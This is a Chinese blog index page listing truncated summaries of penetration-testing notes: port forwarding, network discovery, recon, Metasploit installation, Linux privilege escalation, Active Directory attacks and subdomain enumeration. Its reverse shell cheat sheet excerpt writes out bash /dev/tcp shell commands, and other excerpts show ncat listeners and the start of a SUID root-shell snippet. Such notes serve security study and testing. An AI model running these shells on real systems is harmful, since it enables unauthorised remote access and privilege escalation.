摘要:
Windows netsh Port Forwarding netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectp 阅读全文
posted @ 2019-02-21 11:34
heycomputer
阅读(813)
评论(0)
推荐(0)
摘要:
Netdiscover netdiscover -i eth0 -r 192.168.1.0/24 Currently scanning: Finished! | Screen View: Unique Hosts 20 Captured ARP Req/Rep packets, from 4 ho 阅读全文
posted @ 2019-02-21 11:32
heycomputer
阅读(306)
评论(0)
推荐(0)
摘要:
Reverse Shell Cheat Sheet Bash TCP bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2 阅读全文
posted @ 2019-02-21 11:31
heycomputer
阅读(1161)
评论(0)
推荐(0)
摘要:
Summary Passive Recon Shodan Wayback Machine The Harvester Active Recon Nmap Nmap Script RPCClient Enum4all List all the subdirectories and files Gobu 阅读全文
posted @ 2019-02-21 11:30
heycomputer
阅读(435)
评论(0)
推荐(0)
摘要:
安装 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall & 阅读全文
posted @ 2019-02-21 11:28
heycomputer
阅读(565)
评论(0)
推荐(0)
摘要:
Tools LinEnum - Scripted Local Linux Enumeration & Privilege Escalation Checks ./LinEnum.sh -s -k keyword -r report -e /tmp/ -t BeRoot - Privilege Esc 阅读全文
posted @ 2019-02-21 11:26
heycomputer
阅读(505)
评论(0)
推荐(0)
摘要:
Basic reverse shell ncat --udp -lvp 4242 ncat --sctp -lvp 4242 ncat --tcp -lvp 4242 Suid Binary TMPDIR2="/var/tmp" echo 'int main(void){setresuid(0, 0 阅读全文
posted @ 2019-02-21 11:25
heycomputer
阅读(311)
评论(0)
推荐(0)
摘要:
https://github.com/swisskyrepo/PayloadsAllTheThings Methodology and Resources Active Directory Attack.md Linux - Persistence.md Linux - Privilege Esca 阅读全文
posted @ 2019-02-21 11:22
heycomputer
阅读(386)
评论(0)
推荐(0)
摘要:
Summary Tools Most common paths to AD compromise MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability) Open Shares GPO - Pivoting with Local 阅读全文
posted @ 2019-02-21 11:20
heycomputer
阅读(1404)
评论(0)
推荐(0)
摘要:
Summary Enumerate all subdomains Subbrute KnockPy GoogleDorks EyeWitness Sublist3r Subfinder Aquatone (Ruby and Go versions) AltDNS MassDNS Nmap Subdo 阅读全文
posted @ 2019-02-21 11:18
heycomputer
阅读(2219)
评论(0)
推荐(0)
浙公网安备 33010602011771号